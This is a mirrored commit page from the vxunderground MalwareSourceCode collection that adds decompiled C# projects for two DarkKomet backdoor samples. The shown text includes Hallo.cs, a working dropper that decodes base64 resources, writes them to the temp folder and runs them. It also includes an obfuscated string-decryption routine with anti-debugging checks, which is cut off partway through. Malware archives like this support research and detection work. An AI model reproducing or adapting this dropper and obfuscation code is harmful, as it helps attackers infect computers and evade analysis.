daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-20 17:59:26 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f/AssemblyInfo.cs
+10
View File
@@ -0,0 +1,10 @@
using System.Reflection;
[assembly: AssemblyCompany("4Hh8j6lkmja")]
[assembly: AssemblyProduct("161324UVgNR")]
[assembly: AssemblyDescription("i1y14aP22")]
[assembly: AssemblyTitle("lE2wT5d2")]
[assembly: AssemblyCopyright("83E8u3Vi")]
[assembly: AssemblyFileVersion("6.5.8.5")]
[assembly: AssemblyTrademark("C2o4321p")]
[assembly: AssemblyVersion("3.8.5.2")]
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f/Backdoor.Win32.DarkKomet.fldf.csproj
+47
View File
@@ -0,0 +1,47 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{1A93D3B0-9632-49FA-9D5A-FDD09E01D3B7}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>zizoppo</AssemblyName>
<ApplicationVersion>3.8.5.2</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Hallo.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="D54D561D.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f/Backdoor.Win32.DarkKomet.fldf.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "zizoppo", "Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f.csproj", "{1A93D3B0-9632-49FA-9D5A-FDD09E01D3B7}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1A93D3B0-9632-49FA-9D5A-FDD09E01D3B7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{1A93D3B0-9632-49FA-9D5A-FDD09E01D3B7}.Debug|Any CPU.Build.0 = Debug|Any CPU
{1A93D3B0-9632-49FA-9D5A-FDD09E01D3B7}.Release|Any CPU.ActiveCfg = Release|Any CPU
{1A93D3B0-9632-49FA-9D5A-FDD09E01D3B7}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f/D54D561D.resx
+126
View File
File diff suppressed because one or more lines are too long
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f/Hallo.cs
+49
View File
@@ -0,0 +1,49 @@
// Decompiled with JetBrains decompiler
// Type: Hallo
// Assembly: zizoppo, Version=3.8.5.2, Culture=neutral, PublicKeyToken=null
// MVID: 776D0F53-66DC-4E83-8E1F-AD5C9AC6BB88
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Reflection;
using System.Resources;
[StandardModule]
internal sealed class Hallo
{
[STAThread]
public static void Main()
{
ResourceManager resourceManager = new ResourceManager("D54D561D", Assembly.GetExecutingAssembly());
object resourceSet = (object) resourceManager.GetResourceSet(CultureInfo.CurrentCulture, true, true);
try
{
foreach (object obj in (IEnumerable) resourceSet)
{
DictionaryEntry dictionaryEntry1;
DictionaryEntry dictionaryEntry2 = obj != null ? (DictionaryEntry) obj : dictionaryEntry1;
int offset = 0;
byte[] array = Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject(Conversions.ToString(dictionaryEntry2.Key))));
FileStream fileStream = new FileStream(Conversions.ToString(Operators.ConcatenateObject((object) Path.GetTempPath(), dictionaryEntry2.Key)), FileMode.Create);
int length = array.Length;
fileStream.Write(array, offset, length);
fileStream.Close();
NewLateBinding.LateCall((object) null, typeof (Process), "Start", new object[1]
{
Operators.ConcatenateObject((object) Path.GetTempPath(), dictionaryEntry2.Key)
}, (string[]) null, (Type[]) null, (bool[]) null, true);
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: zizoppo, Version=3.8.5.2, Culture=neutral, PublicKeyToken=null
// MVID: 776D0F53-66DC-4E83-8E1F-AD5C9AC6BB88
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: zizoppo, Version=3.8.5.2, Culture=neutral, PublicKeyToken=null
// MVID: 776D0F53-66DC-4E83-8E1F-AD5C9AC6BB88
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: zizoppo, Version=3.8.5.2, Culture=neutral, PublicKeyToken=null
// MVID: 776D0F53-66DC-4E83-8E1F-AD5C9AC6BB88
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.fldf-a9d4567ebbd6694447e294638aaae741f46b88c075b72d0ece6fca0b69eb820f.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[HideModuleName]
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("10-June")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyTrademark("")]
[assembly: Guid("f1dbb7b3-5c9b-4ea1-8639-50f9fe1e523f")]
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("10-June")]
[assembly: AssemblyCopyright("Copyright © 2011")]
[assembly: SuppressIldasm]
[assembly: AssemblyCompany("")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/Backdoor.Win32.DarkKomet.flmi.csproj
+53
View File
@@ -0,0 +1,53 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{429ED5B3-AF58-4102-BC11-7AAAF6B2D3E5}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>10-June</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_0002.cs" />
<Compile Include="_0003.cs" />
<Compile Include="_0005.cs" />
<Compile Include="_0006.cs" />
<Compile Include="_0008.cs" />
<Compile Include="_000E.cs" />
<Compile Include="_000F.cs" />
<Compile Include="_10_June\Form1.cs" />
<Compile Include="_10_June\My\MySettings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="" />
<EmbeddedResource Include="_10_June\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/Backdoor.Win32.DarkKomet.flmi.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "10-June", "Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.csproj", "{429ED5B3-AF58-4102-BC11-7AAAF6B2D3E5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{429ED5B3-AF58-4102-BC11-7AAAF6B2D3E5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{429ED5B3-AF58-4102-BC11-7AAAF6B2D3E5}.Debug|Any CPU.Build.0 = Debug|Any CPU
{429ED5B3-AF58-4102-BC11-7AAAF6B2D3E5}.Release|Any CPU.ActiveCfg = Release|Any CPU
{429ED5B3-AF58-4102-BC11-7AAAF6B2D3E5}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_0002.cs
+45
View File
@@ -0,0 +1,45 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Windows.Forms;
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class \u0002 : WindowsFormsApplicationBase
{
[DebuggerStepThrough]
public \u0002()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
[STAThread]
[DebuggerHidden]
internal static void \u0002(string[] _param0)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
\u0005.\u0002().Run(_param0);
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) \u0005.\u0002().\u0002();
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_0003.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class \u0003 : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public \u0003()
{
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_0005.cs
+195
View File
@@ -0,0 +1,195 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using _10_June;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
[StandardModule]
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class \u0005
{
private static readonly \u0005.\u0005<\u0003> \u0002 = new \u0005.\u0005<\u0003>();
private static readonly \u0005.\u0005<\u0002> \u0003 = new \u0005.\u0005<\u0002>();
private static readonly \u0005.\u0005<User> \u0005 = new \u0005.\u0005<User>();
private static \u0005.\u0005<\u0005.\u0002> \u0008 = new \u0005.\u0005<\u0005.\u0002>();
private static readonly \u0005.\u0005<\u0005.\u0003> \u0006 = new \u0005.\u0005<\u0005.\u0003>();
[DebuggerNonUserCode]
static \u0005()
{
}
[DebuggerHidden]
internal static \u0003 \u0002() => \u0005.\u0002.\u0002();
[DebuggerHidden]
internal static \u0002 \u0002() => \u0005.\u0003.\u0002();
[DebuggerHidden]
internal static User \u0002() => \u0005.\u0005.\u0002();
[DebuggerHidden]
internal static \u0005.\u0002 \u0002() => \u0005.\u0008.\u0002();
[DebuggerHidden]
internal static \u0005.\u0003 \u0002() => \u0005.\u0006.\u0002();
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class \u0002
{
public Form1 \u0002;
[ThreadStatic]
private static Hashtable \u0003;
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public \u0002()
{
}
[DebuggerNonUserCode]
public Form1 \u0002()
{
this.\u0002 = \u0005.\u0002.\u0002<Form1>(this.\u0002);
return this.\u0002;
}
[DebuggerNonUserCode]
public void \u0002(Form1 _param1)
{
if (_param1 == this.\u0002)
return;
if (_param1 != null)
throw new ArgumentException(\u000E.\u0002(759805957));
this.\u0003<Form1>(ref this.\u0002);
}
[DebuggerHidden]
private static T \u0002<T>(T _param0) where T : Form, new()
{
if ((object) _param0 != null && !_param0.IsDisposed)
return _param0;
if (\u0005.\u0002.\u0003 != null)
{
if (\u0005.\u0002.\u0003.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString(\u000E.\u0002(759805999)));
}
else
\u0005.\u0002.\u0003 = new Hashtable();
\u0005.\u0002.\u0003.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString(\u000E.\u0002(759806032), ex.InnerException.Message), ex.InnerException);
}
finally
{
\u0005.\u0002.\u0003.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void \u0003<T>(ref T _param1) where T : Form
{
_param1.Dispose();
_param1 = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object _param1) => base.Equals(RuntimeHelpers.GetObjectValue(_param1));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal System.Type \u0002() => typeof (\u0005.\u0002);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class \u0003
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public \u0003()
{
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object _param1) => base.Equals(RuntimeHelpers.GetObjectValue(_param1));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal System.Type \u0002() => typeof (\u0005.\u0003);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T \u0002<T>(T _param0) where T : new() => (object) _param0 == null ? new T() : _param0;
[DebuggerHidden]
private void \u0003<T>(ref T _param1) => _param1 = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class \u0005<\u0002> where \u0002 : new()
{
[ThreadStatic]
private static \u0002 \u0002;
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public \u0005()
{
}
[DebuggerHidden]
internal \u0002 \u0002()
{
if ((object) \u0005.\u0005<\u0002>.\u0002 == null)
\u0005.\u0005<\u0002>.\u0002 = new \u0002();
return \u0005.\u0005<\u0002>.\u0002;
}
}
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_0006.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using _10_June.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.Diagnostics;
[DebuggerNonUserCode]
[HideModuleName]
[StandardModule]
internal sealed class \u0006
{
internal static MySettings \u0002() => MySettings.Default;
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_0008.cs
+33
View File
@@ -0,0 +1,33 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[StandardModule]
[HideModuleName]
[DebuggerNonUserCode]
internal sealed class \u0008
{
private static ResourceManager \u0002;
private static CultureInfo \u0003;
internal static ResourceManager \u0002()
{
if (object.ReferenceEquals((object) \u0008.\u0002, (object) null))
\u0008.\u0002 = new ResourceManager(\u000E.\u0002(759806128), typeof (\u0008).Assembly);
return \u0008.\u0002;
}
internal static CultureInfo \u0002() => \u0008.\u0003;
internal static void \u0002(CultureInfo _param0) => \u0008.\u0003 = _param0;
}
MSIL/Backdoor/Win32/D/Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3/_000E.cs
+191
View File
@@ -0,0 +1,191 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: 10-June, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2713F504-3EB6-448B-931C-99CD142737FF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.DarkKomet.flmi-c6a635f08367ebc14e97e098c251f12ec8876284411ed7ac0b77e79a540debb3.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u000E
{
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(6);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static int \u0006;
private static byte[] \u000E;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static string \u0002(int _param0)
{
lock (\u000E.\u0002)
{
string str1;
byte[] numArray1;
for (; !\u000E.\u0002.TryGetValue(_param0, out str1); _param0 = ((int) numArray1[2] | (int) numArray1[3] << 16 | (int) numArray1[0] << 8 | (int) numArray1[1] << 24) ^ -_param0)
{
if (\u000E.\u0003 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
Assembly.GetCallingAssembly();
\u000E.\u0006 = 1610370;
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream("\u200B");
int skipFrames = 1;
StackTrace stackTrace = new StackTrace(skipFrames, false);
\u000E.\u0006 ^= 6470 | skipFrames;
int index = skipFrames - 1;
StackFrame frame = stackTrace.GetFrame(index);
MethodBase methodBase = frame == null ? (MethodBase) null : frame.GetMethod();
\u000E.\u0006 ^= index + 128;
Type type = (object) methodBase == null ? (Type) null : methodBase.DeclaringType;
if (frame == null)
\u000E.\u0006 ^= 219315;
bool flag = (object) type == (object) typeof (RuntimeMethodHandle);
\u000E.\u0006 ^= 160;
if (!flag)
{
flag = (object) type == null;
if (flag)
\u000E.\u0006 ^= 219283;
}
if (flag == (stackTrace != null))
\u000E.\u0006 ^= 32;
\u000E.\u0006 ^= 6502 | index + 1;
\u000E.\u0003 = new BinaryReader(manifestResourceStream);
